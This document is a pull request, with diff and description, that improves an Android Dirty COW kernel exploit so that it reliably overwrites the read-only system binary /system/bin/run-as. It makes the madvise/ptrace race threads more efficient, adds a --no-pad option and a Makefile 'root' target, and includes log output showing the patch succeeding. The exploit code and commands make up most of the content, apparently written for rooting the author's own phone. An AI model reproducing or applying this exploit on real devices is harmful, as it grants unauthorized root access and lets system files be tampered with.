### PR TITLE
Make ptrace method much more efficient

### DIFF
--- a/Android.mk
+++ b/Android.mk
@@ -15,7 +15,6 @@ include $(BUILD_EXECUTABLE)
 include $(CLEAR_VARS)
 LOCAL_MODULE := run-as
 LOCAL_SRC_FILES := \
-	dirtycow.c \
 	run-as.c
 
 LOCAL_CFLAGS += -DDEBUG

--- a/Makefile
+++ b/Makefile
@@ -23,7 +23,7 @@ test: push
 root: push
 	adb shell 'chmod 777 /data/local/tmp/dcow'
 	adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
-	adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
+	adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
 
 clean:
 	rm -rf libs

--- a/Makefile
+++ b/Makefile
@@ -23,6 +23,7 @@ test: push
 root: push
 	adb shell 'chmod 777 /data/local/tmp/dcow'
 	adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
+	adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
 	adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
 
 clean:

--- a/dirtycow.c
+++ b/dirtycow.c
@@ -244,8 +244,13 @@ static void exploit(struct mem_arg *mem_arg)
 
 int dcow(int argc, const char * argv[])
 {
-	if (argc < 2) {
-		LOGV("usage %s /data/local/tmp/default.prop /default.prop", argv[0]);
+	if (argc < 2 || argc > 4) {
+		LOGV("Usage %s INFILE OUTFILE [--no-pad]", argv[0]);
+		LOGV("  INFILE: file to read from, e.g., /data/local/tmp/default.prop")
+		LOGV("  OUTFILE: file to write to, e.g., /default.prop")
+		LOGV("  --no-pad: If INFILE is smaller than OUTFILE, overwrite the")
+		LOGV("    beginning of OUTFILE only, do not fill the remainder with")
+		LOGV("    zeros (option must be given last)")
 		return 0;
 	}
 
@@ -284,10 +289,15 @@ int dcow(int argc, const char * argv[])
 
 	size_t size = st2.st_size;
 	if (st2.st_size != st.st_size) {
-		LOGV("warning: new file size (%lld) and destination file size (%lld) differ\n", (unsigned long long)st2.st_size, (unsigned long long)st.st_size);
+		LOGV("warning: source file size (%lld) and destination file size (%lld) differ", (unsigned long long)st2.st_size, (unsigned long long)st.st_size);
 		if (st2.st_size > st.st_size) {
-			LOGV("corruption?\n");
-		} else {
+			LOGV("         corruption?\n");
+		}
+		else if (argc > 3 && strncmp(argv[3], "--no-pad", 8) == 0) {
+			LOGV("         will overwrite first %lld bytes of destination only\n", (unsigned long long)size);
+		}
+		else {
+			LOGV("         will append %lld zero bytes to source\n", (unsigned long long)(st.st_size - st2.st_size));
 			size = st.st_size;
 		}
 	}

--- a/dirtycow.c
+++ b/dirtycow.c
@@ -111,10 +111,12 @@ static int ptrace_memcpy(pid_t pid, void *dest, const void *src, size_t n)
 	s = src;
 
 	while (n >= sizeof(long)) {
-		memcpy(&value, s, sizeof(value));
-		if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {
-			warn("ptrace(PTRACE_POKETEXT)");
-			return -1;
+		if (*((long *) s) != *((long *) d)) {
+			memcpy(&value, s, sizeof(value));
+			if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {
+				warn("ptrace(PTRACE_POKETEXT)");
+				return -1;
+			}
 		}
 
 		n -= sizeof(long);

--- a/dirtycow.c
+++ b/dirtycow.c
@@ -41,6 +41,7 @@ struct mem_arg  {
 static void *checkThread(void *arg) {
 	struct mem_arg *mem_arg;
 	mem_arg = (struct mem_arg *)arg;
+	LOGV("[*] check thread starts, address %p, size %zd", mem_arg->offset, mem_arg->patch_size);
 	struct stat st;
 	int i;
 	char * newdata = malloc(mem_arg->patch_size);
@@ -62,10 +63,12 @@ static void *checkThread(void *arg) {
 		if (memcmpret == 0) {
 			mem_arg->stop = 1;
 			mem_arg->success = 1;
+			LOGV("[*] check thread stops, patch successful, iterations %d", i);
 			goto cleanup;
 		}
 		usleep(100 * 1000);
 	}
+	LOGV("[*] check thread stops, timeout, iterations %d", i);
 
 cleanup:
 	if (newdata) {
@@ -86,13 +89,13 @@ static void *madviseThread(void *arg)
 	size = mem_arg->patch_size;
 	addr = (void *)(mem_arg->offset);
 
-	LOGV("[*] madvise = %p %zd", addr, size);
+	LOGV("[*] madvise thread starts, address %p, size %zd", addr, size);
 
 	for(i = 0; i < LOOP && !mem_arg->stop; i++) {
 		c += madvise(addr, size, MADV_DONTNEED);
 	}
 
-	LOGV("[*] madvise = %d %d", c, i);
+	LOGV("[*] madvise thread stops, return code sum %d, iterations %d", c, i);
 	mem_arg->stop = 1;
 	return 0;
 }
@@ -143,12 +146,14 @@ static void *ptraceThread(void *arg)
 	struct mem_arg *mem_arg;
 	mem_arg = (struct mem_arg *)arg;
 
-	int i, c;
+	LOGV("[*] ptrace thread starts, address %p, size %zd", mem_arg->offset, mem_arg->patch_size);
+
+	int i, c = 0;
 	for (i = 0; i < LOOP && !mem_arg->stop; i++) {
-		c = ptrace_memcpy(pid, mem_arg->offset, mem_arg->patch, mem_arg->patch_size);
+		c += ptrace_memcpy(pid, mem_arg->offset, mem_arg->patch, mem_arg->patch_size);
 	}
 
-	LOGV("[*] ptrace %d %i", c, i);
+	LOGV("[*] ptrace thread stops, return code sum %d, iterations %i", c, i);
 
 	mem_arg->stop = 1;
 	return NULL;
@@ -228,7 +233,7 @@ static void exploit(struct mem_arg *mem_arg)
 		pthread_join(pth2, NULL);
 	}
 
-	LOGV("[*] exploited %d %p=%lx", pid, (void*)mem_arg->offset, *(unsigned long*)mem_arg->offset);
+	LOGV("[*] finished pid=%d sees %p=%lx", pid, (void*)mem_arg->offset, *(unsigned long*)mem_arg->offset);
 }
 
 int dcow(int argc, const char * argv[])

--- a/dirtycow.c
+++ b/dirtycow.c
@@ -83,7 +83,7 @@ static void *madviseThread(void *arg)
 	struct mem_arg *mem_arg;
 	size_t size;
 	void *addr;
-	int i, c = 0;
+	int i = 0, c = 0;
 
 	mem_arg = (struct mem_arg *)arg;
 	size = mem_arg->patch_size;
@@ -91,8 +91,9 @@ static void *madviseThread(void *arg)
 
 	LOGV("[*] madvise thread starts, address %p, size %zd", addr, size);
 
-	for(i = 0; i < LOOP && !mem_arg->stop; i++) {
+	while(!mem_arg->stop) {
 		c += madvise(addr, size, MADV_DONTNEED);
+		i++;
 	}
 
 	LOGV("[*] madvise thread stops, return code sum %d, iterations %d", c, i);
@@ -148,9 +149,10 @@ static void *ptraceThread(void *arg)
 
 	LOGV("[*] ptrace thread starts, address %p, size %zd", mem_arg->offset, mem_arg->patch_size);
 
-	int i, c = 0;
-	for (i = 0; i < LOOP && !mem_arg->stop; i++) {
+	int i = 0, c = 0;
+	while (!mem_arg->stop) {
 		c += ptrace_memcpy(pid, mem_arg->offset, mem_arg->patch, mem_arg->patch_size);
+		i++;
 	}
 
 	LOGV("[*] ptrace thread stops, return code sum %d, iterations %i", c, i);

--- a/dirtycow.c
+++ b/dirtycow.c
@@ -221,6 +221,8 @@ static void exploit(struct mem_arg *mem_arg)
 			pthread_create(&pth1, NULL, madviseThread, mem_arg);
 			ptrace(PTRACE_TRACEME);
 			kill(getpid(),SIGSTOP);
+			// we're done, tell madviseThread to stop and wait for it
+			mem_arg->stop = 1;
 			pthread_join(pth1, NULL);
 		}
 	} else {

--- a/run-as.c
+++ b/run-as.c
@@ -22,8 +22,6 @@ char __aeabi_unwind_cpp_pr0[0];
 typedef int getcon_t(char ** con);
 typedef int setcon_t(const char* con);
 
-extern int dcow(int argc, const char *argv[]);
-
 int main(int argc, const char **argv)
 {
 	LOGV("uid %s %d", argv[0], getuid());


### PR DESCRIPTION
On my device (Xperia Ray) the `/proc/self/mem` method does not work, and the `ptrace` method only managed to mangle a few long words in `/system/bin/run-as` (such that it crashed with a segfault when running it). The simple 12-byte test file worked fine though. After adding some more status messages (e4398ca), I found that
* The madvise thread stopped too early because of the fixed loop count. I removed the iteration limit (0ac3679) and had it exit when the ptrace thread exits (de5c9a2; originally, it always continued to run up to the loop limit, because `mem_arg->stop = 1` was only ever set in the other fork).
* The ptrace thread spent much of its time on long words it had already overwritten. I added a comparison so it skipped long words that already match (d177e97).
* 90% of the work lay in overwriting the last 90% of `/system/bin/run-as` with zeros. I added a `--no-pad` option which only overwrites the beginning of `/system/bin/run-as` with the replacement `run-as` and leaves the remainder untouched (5bb0ab4).

With these changes, patching went through in no time:
```
$ ./dcow run-as /system/bin/run-as --no-pad
warning: new file size (5544) and destination file size (64028) differ
         will overwrite first 5544 bytes of destination only

[*] size 5544
[*] mmap 0x2ab28000
[*] currently 0x2ab28000=464c457f
[*] using ptrace method
[*] check thread starts, address 0x2ab28000, size 5544
[*] ptrace thread starts, address 0x2ab28000, size 5544
[*] madvise thread starts, address 0x2ab28000, size 5544
[*] check thread stops, patch successful, iterations 36
[*] ptrace thread stops, return code sum 0, iterations 45530
[*] finished pid=25157 sees 0x2ab28000=464c457f
[*] madvise thread stops, return code sum 0, iterations 1766133
[*] finished pid=0 sees 0x2ab28000=464c457f
```
Without, the checking thread always timed out before all long words were patched.

For good measure, I added backing up the original `run-as` binary to the Makefile (c3ce1c1), and removed `dcow` from the `run-as.c` file as it is not needed there and confused me (67221ed).

If these are too many changes for a single PR, let me know and I can split things up. Thank you for the great foundation!